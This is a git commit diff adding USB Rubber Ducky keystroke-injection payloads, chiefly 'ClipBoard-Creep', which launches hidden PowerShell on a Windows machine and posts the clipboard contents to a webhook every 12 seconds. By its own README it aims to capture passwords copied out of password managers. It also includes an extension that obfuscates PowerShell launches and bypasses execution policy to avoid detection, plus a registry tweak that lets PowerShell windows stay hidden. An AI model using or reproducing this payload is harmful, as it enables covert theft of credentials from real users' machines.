Merge pull request #343 from 0iphor13/master

Uploaded ClipBoard-Creep & Extensions: Detect_Finished; Windows11_Console_Downgrade
2023-07-21 07:38:20 -04:00 · 2023-07-21 07:38:20 -04:00 · 95aab5627a
parent 32f997633c 42fb5a27a2
commit 95aab5627a
8 changed files with 294 additions and 0 deletions
--- a/payloads/extensions/community/Detect_Finished
+++ b/payloads/extensions/community/Detect_Finished
@ -0,0 +1,31 @@
+EXTENSION Detect_Finished
+    REM VERSION 1.0
+    REM AUTHOR: 0iphor13
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Use the function Detect_Finished() to signal the finished execution of your payload.
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #PAUSE 150
+    FUNCTION Detect_Finished()
+        IF ($_CAPSLOCK_ON == FALSE)
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            ATTACKMODE OFF
+        ELSE IF
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            ATTACKMODE OFF
+        END_IF
+    END_FUNCTION
+END_EXTENSION
--- a/payloads/extensions/community/Windows11_Console_Downgrade
+++ b/payloads/extensions/community/Windows11_Console_Downgrade
@ -0,0 +1,35 @@
+EXTENSION Windows11_Console_Downgrade
+    REM_BLOCK
+        Version: 1.0
+        Author: 0iphor13
+        Description: Downgrade the default command prompt of Windows 11 to use Conhost again. 
+        Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.
+    END_REM
+
+    REM CONFIGURATION:
+    REM Used to wait until initial execution
+    DEFINE #INPUT_WAIT 2000
+    REM GUID for using the legacy console host for terminal execution
+    DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D
+ 
+    FUNCTION Console_Downgrade()
+        DELAY #INPUT_WAIT  
+        GUI r
+        DELAY 500
+        STRINGLN powershell -NoP -NonI
+        DELAY 1000
+        STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";
+        STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit
+    END_FUNCTION
+
+    REM_BLOCK
+        EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.
+        Console_Downgrade()
+        DELAY 2000
+        GUI r
+        DELAY 2000
+        STRINGLN powershell -w h
+        DELAY 1500
+        STRINGLN calc.exe;exit
+    END_REM
+END_EXTENSION
--- a/payloads/extensions/community/Windows_Elevated_Execution
+++ b/payloads/extensions/community/Windows_Elevated_Execution
--- a/payloads/library/exfiltration/ClipBoard-Creep/README.md
+++ b/payloads/library/exfiltration/ClipBoard-Creep/README.md
@ -0,0 +1,17 @@
+# Clipboard-Creep #
+Clipboard-Creep is a basic script which tracks the users clipboard and exfiltrates it contents. It was created to get access to passwords copied out of password managers, but might be useful in general.
+
+
+## Usage ##
+### #HOOK ###
+Define your webhook under #HOOK
+
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png)
+
+### #CALLBACK_DELAY ###
+Define a timer under #CALLBACK_DELAY. This defines the pause between calls to your webhook. A default of 12 seconds was choosen to capture potential passwords, in clipboards of password managers.
+
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png)
+
+After successful execution you'll see the contents of your targets clipboard or simply signs of life flying into your webhook. 
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png)
--- a/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png
+++ b/payloads/library/exfiltration/ClipBoard-Creep/media/callback.png
--- a/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png
+++ b/payloads/library/exfiltration/ClipBoard-Creep/media/clippy.png
--- a/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png
+++ b/payloads/library/exfiltration/ClipBoard-Creep/media/hook.png
--- a/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
+++ b/payloads/library/exfiltration/ClipBoard-Creep/payload.txt
@ -0,0 +1,211 @@
+REM       Clipboard-Creep
+REM       Version 1.0
+REM       OS: Windows
+REM       Author: 0iphor13
+REM       Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
+REM       This payload aims on the targets clipboard. Define a webhook plug in your payload and observe the clipboard content on your catching server.
+REM       Based on Clipboard-Creep.ps1 - https://github.com/0iphor13/ClipBoard-Creep
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+EXTENSION EXTENSION Rolling_Powershell_Execution
+    REM VERSION 1.0
+    REM Author: 0iphor13
+    REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
+    REM Requirements: PayloadStudio v.1.3 minimum
+    REM Starts Powershell in uncommon ways to avoid basic detection
+    REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
+
+    REM CONFIGURATION:
+    REM Add ExecutionPolicy bypass
+    DEFINE #EXECUTIONPOLICY FALSE
+    DEFINE #DELAY 500
+
+    $_RANDOM_MIN = 1
+    $_RANDOM_MAX = 16
+    VAR $RANDOM_PS = $_RANDOM_INT
+    FUNCTION Rolling_Powershell_Execution()
+        IF ($RANDOM_PS == 1) THEN
+            STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
+        ELSE IF ($RANDOM_PS == 2) THEN
+            STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
+        ELSE IF ($RANDOM_PS == 3) THEN
+            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
+        ELSE IF ($RANDOM_PS == 4) THEN
+            STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
+        ELSE IF ($RANDOM_PS == 5) THEN
+            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
+        ELSE IF ($RANDOM_PS == 6) THEN
+            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
+        ELSE IF ($RANDOM_PS == 7) THEN
+            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
+        ELSE IF ($RANDOM_PS == 8) THEN
+            STRING powershell -NoPro -noninT -win h
+        ELSE IF ($RANDOM_PS == 9) THEN
+            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
+        ELSE IF ($RANDOM_PS == 2) THEN
+            STRING powershell.exe -NoP -nOni -W h
+        ELSE IF ($RANDOM_PS == 10) THEN
+            STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
+        ELSE IF ($RANDOM_PS == 11) THEN
+            STRING powershell -nopr -noninT -W HiddEn
+        ELSE IF ($RANDOM_PS == 12) THEN
+            STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
+        ELSE IF ($RANDOM_PS == 13) THEN
+            STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
+        ELSE IF ($RANDOM_PS == 14) THEN
+            STRING powershell -noproF -noni -W Hi
+        ELSE IF ($RANDOM_PS == 15) THEN
+            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
+        ELSE ($RANDOM_PS == 16) THEN
+            STRING powershell.exe -noP -nOnI -windo H
+        END_IF
+
+
+    IF_DEFINED_TRUE #EXECUTIONPOLICY
+        SPACE
+        IF (($RANDOM_PS % 2) == 0) THEN
+            STRING -ep ByPasS
+        ELSE IF (($RANDOM_PS % 5) == 0) THEN
+            STRING -exec bypass
+        ELSE IF (($RANDOM_PS % 7) == 0) THEN
+            STRING -exeC byPasS
+        ELSE IF (($RANDOM_PS % 10) == 0) THEN
+            STRING -exEcUtionPoL bYpaSs
+        ELSE IF (($RANDOM_PS % 12) == 0) THEN
+            STRING -exEcUtion bYPaSs
+        ELSE
+            STRING -eP BYPaSs
+        END_IF
+    END_IF_DEFINED
+    ENTER
+    DELAY #DELAY
+    END_FUNCTION
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM DELAY 2000
+    REM GUI r
+    REM DELAY 2000
+    REM Rolling_Powershell_Execution()
+END_EXTENSION
+
+EXTENSION Detect_Finished
+    REM VERSION 1.0
+    REM AUTHOR: 0iphor13
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Use the function Detect_Finished() to signal the finished execution of your payload.
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #PAUSE 150
+    FUNCTION Detect_Finished()
+        IF ($_CAPSLOCK_ON == FALSE)
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            ATTACKMODE OFF
+        ELSE IF
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            DELAY #PAUSE
+            CAPSLOCK
+            ATTACKMODE OFF
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+
+
+REM Define URL of your catching webhook
+DEFINE #HOOK "https://example.com/"
+REM Define the pause between calls to your webhook. 
+DEFINE #CALLBACK_DELAY 12
+
+IF ($_OS == WINDOWS) THEN
+    GUI r
+    DELAY 1000
+    REM randomized and obfuscated way to start powershell
+    Rolling_Powershell_Execution()
+    STRINGLN_POWERSHELL
+    $e = $null
+    while ($true) 
+    {
+        $c = Get-Clipboard
+        if ($c) 
+        {
+            if ($c -ne $e)
+            {
+                $o = "Clipboard content: $c"
+                irm -Uri #HOOK -Method POST -Body $o
+            } else 
+            {
+                $o = "Clipboard content hasn't changed"
+                irm -Uri #HOOK -Method POST -Body $o
+            }
+            $e = $c
+            } else 
+            {
+            $o = "Clipboard is empty"
+            irm -Uri #HOOK -Method POST -Body $o
+        }
+        sleep -s #CALLBACK_DELAY
+    }
+    END_STRINGLN
+    ENTER
+    DELAY 250
+    Detect_Finished()
+ELSE
+    ATTACKMODE OFF
+END_IF
+
+
+
+
+